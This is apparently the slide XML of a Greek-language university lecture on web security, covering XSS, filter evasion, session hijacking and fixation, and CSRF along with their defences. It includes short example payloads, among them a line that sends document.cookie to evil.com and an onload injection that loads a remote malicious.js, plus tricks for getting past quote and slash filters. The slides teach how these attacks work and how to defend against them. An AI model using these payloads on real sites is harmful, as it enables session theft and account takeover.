              <a:t>&lt;script&gt;alert(“Say my name!”)&lt;/script&gt;</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Όταν ο χρήστης παρασυρθεί και κάνει κλικ σε ένα κακόβουλο σύνδεσμο ή υποβάλει μια “πειραγμένη” φόρμα, το αίτημα ταξιδεύει στον ευάλωτο server και επιστρέφει πίσω στον browser του χρήστη.</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Προϋποθέτει την αποθήκευση του κακόβουλου script στην web εφαρμογή, για παράδειγμα σε ένα blog.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="764540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Αρχικά ο εισβολέας αποθηκεύει το κακόβουλο script σαν σχόλιο σε ένα blog post.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="764540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Στη συνέχεια, κάθε χρήστης που θα διαβάσει το “μολυσμένο” blog post θα κατεβάσει και θα εκτελέσει τον κακόβουλο κώδικα στον browser του.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Shape 34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Stored XSS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pic>
        <p:nvPicPr>
          <p:cNvPr id="352" name="Shape 352"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041925" y="252625"/>
            <a:ext cx="6932400" cy="463822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3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Πώς μπορούμε να επιτεθούμε στον παρακάτω κώδικα;</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form action="post.php" method="post"&gt;</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;textarea name="body"/&gt;&lt;/textarea&gt;</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" value="Submit"/&gt;</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</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262626"/>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rgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;blockquote&gt;</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?php</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  //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rgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  // Retrieved from storage</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  echo $comment</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</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262626"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/blockquote&gt;</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Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 36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Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138900" y="2155216"/>
            <a:ext cx="2464923" cy="181557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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1216725"/>
            <a:ext cx="8331898"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Δημιουργούμε ένα σχόλιο με body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“Say my name!”)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Το σχόλιο θα εμφανιστεί σε κάθε επισκέπτη της σελίδα και ο κακόβουλος κώδικας θα εκτελεστεί στον browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Shape 37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Stored XSS Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="Shape 371"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027650" y="3041750"/>
            <a:ext cx="2341248" cy="1788949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Shape 372"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637673" y="3255136"/>
            <a:ext cx="3717400" cy="13621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pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Shape 58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="514349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pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055575" y="159498"/>
            <a:ext cx="7032849" cy="482449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XSS Tricks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1063375"/>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Πώς η εισβολέας υποκλέπτει πληροφορίες;</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document.images[0].src=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>” + document.cookie;</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Πώς παρακάμπτουμε τα filtered quotes;</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Unicode equivalents \u0022 and \u0027</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Πώς παρακάμπτουμε το line based filtering;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&lt;IMG SRC="javasc</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ript:alert('Gotcha!');"&gt; </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&lt;-- line break trick \10 \13 as delimiters. --&gt;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XSS Tricks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Shape 389"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8526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Πώς παρακάμπτουμε τα filtered quotes με regular expressions?</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regexp = /SecProg is boring/;</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alert(regexp.source);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Πόσο κώδικα μπορούμε να εισάγουμε;</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&lt;img src='http://www.safe.com/blank.gif'</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onload='document.scripts(0).src="http://evil/malicious.js"'/&gt;</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Η κάθετος "/" φιλτράρεται. Να είστε δημιουργικοί!</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var str = new RegExp(“http: evil.com malicious.js”),</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    slash=location.href.charAt(6),</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    space=str.source.charAt(5);</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alert(str.source.split(space).join(slash));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Shape 39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XSS Tricks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XSS swiss army knife</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 40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sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="402" name="Shape 402"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985800" y="2277275"/>
            <a:ext cx="3172399" cy="224389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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411600" y="2245800"/>
            <a:ext cx="8320800" cy="6518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3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Πώς μπορούμε να προστατευθούμε από XSS επιθέσεις;</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Προστασία από XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="11239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Η αντιμετώπιση των XSS επιθέσεων είναι ιδιαίτερα δύσκολη.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Τα ευρέως γνωστά web frameworks (Ruby on Rails, Django, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="1600"/>
              <a:t>CakePHP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) αντιμετωπίζουν επιτυχώς τις περισσότερες επιθέσεις με input sanitization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Χρήση template engines για την παραγωγή του HTML markup.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Application-level firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Static code analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Tα HttpOnly cookies δεν επιτρέπουν στην javascript να έχει πρόσβαση στο </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Session Attacks</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Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Shape 42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Το HTTP είναι stateless.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Δεν “θυμάται” τα προηγούμενα requests.</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Μια web εφαρμογή πρέπει να δημιουργεί, να διαχειρίζεται και να συσχετίζει τα sessions με ένα μοναδικό Session ID.</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Τα δεδομένα του Session αποθηκεύονται στον client ή στον server.</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Sessions and authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 43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Η πιστοποίηση χρηστών (authentication) στις web εφαρμογές στηρίζεται στον μηχανισμό των sessions.</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Η υποκλοπή ενός ενεργού session ID επιτρέπει την πλαστοπροσωπία του θύματος.</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To session ID αποθηκεύεται συνήθως σε cookie στον browser του χρήστη.</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Προστατέψτε το session ID!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Το κοινό πρόβλημα</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="370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Οι εισβολείς μπορούν να παρέμβουν σε οποιοδήποτε τμήμα ενός HTTP request.</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URL</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headers</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cookies</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DOM </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forms</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scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="45720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stylesheets</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Session fixation and hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 43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Session hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Υποκλοπή των HTTP requests/responses και εξαγωγή του session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Προσοχή στα ελεύθερα WiFi. Δοκιμάστε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="1600"/>
              <a:t>κάποιον sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="16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Guessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Πρόβλεψη (ή τουλάχιστον καλή εικασία) του session ID με χρήση brute force τεχνικών.</a:t>
            </a:r>
          </a:p>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Session Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="0" marL="45720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Ο εισβολέας εξαναγκάζει το θύμα να χρησιμοποιήσει συγκεκριμένο session ID έχοντας εκκινήσει το session για λογαριασμό του νόμιμου χρήστη.</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pic>
        <p:nvPicPr>
          <p:cNvPr id="441" name="Shape 441"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104236" y="1189875"/>
            <a:ext cx="4935524" cy="3701650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Shape 44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Firesheep</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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="19918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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross site request forgery</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Ο εισβολέας χρησιμοποιώντας κακόβουλο κώδικα, αναγκάζει τον browser του “θύματος” να εκτελεί HTTP requests προς την ευάλωτη web εφαρμογή δίχως τη συγκατάθεση του χρήστη.</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					</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Για κάθε request σε κάποιο domain, οι browsers περιλαμβάνουν αυτόματα όλα τα δεδομένα του χρήστη που σχετίζονται με αυτό το domain. (session ID, cookies, IP address, κτλ...).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Ακόμη και για requests που πυροδοτούνται από μια form, ένα script ή μια εικόνα.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Shape 45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Cross site request forgery - CSRF</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1" i="0" sz="3600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Shape 45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pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Shape 460"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="118275"/>
            <a:ext cx="9024848" cy="49069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Προστασία από επιθέσεις CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Shape 466"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8305799"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Ορθή χρήση των HTTP methods. Μην χρησιμοποιείται GET για requests που αλλάζουν το state του server.</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Μέσω CSRF tokens που παράγονται από το session ID και ένα μυστικό token στον server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="29210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Τα CSRF tokens πρέπει να περιλαμβάνονται σε κάθε requests και να επαληθεύονται στον server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form action="/transfer.php" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;input type="hidden" name="CSRFToken" value="OWY4NmQwODE4"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="amount"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" value="Transfer" /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</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3810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Αληθινές CSRF επιθέσεις</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Shape 472"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1749000" y="1352550"/>
            <a:ext cx="7090199"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Gmail: Υποκλοπή της λίστας επαφών του χρήστη</a:t>
            </a:r>
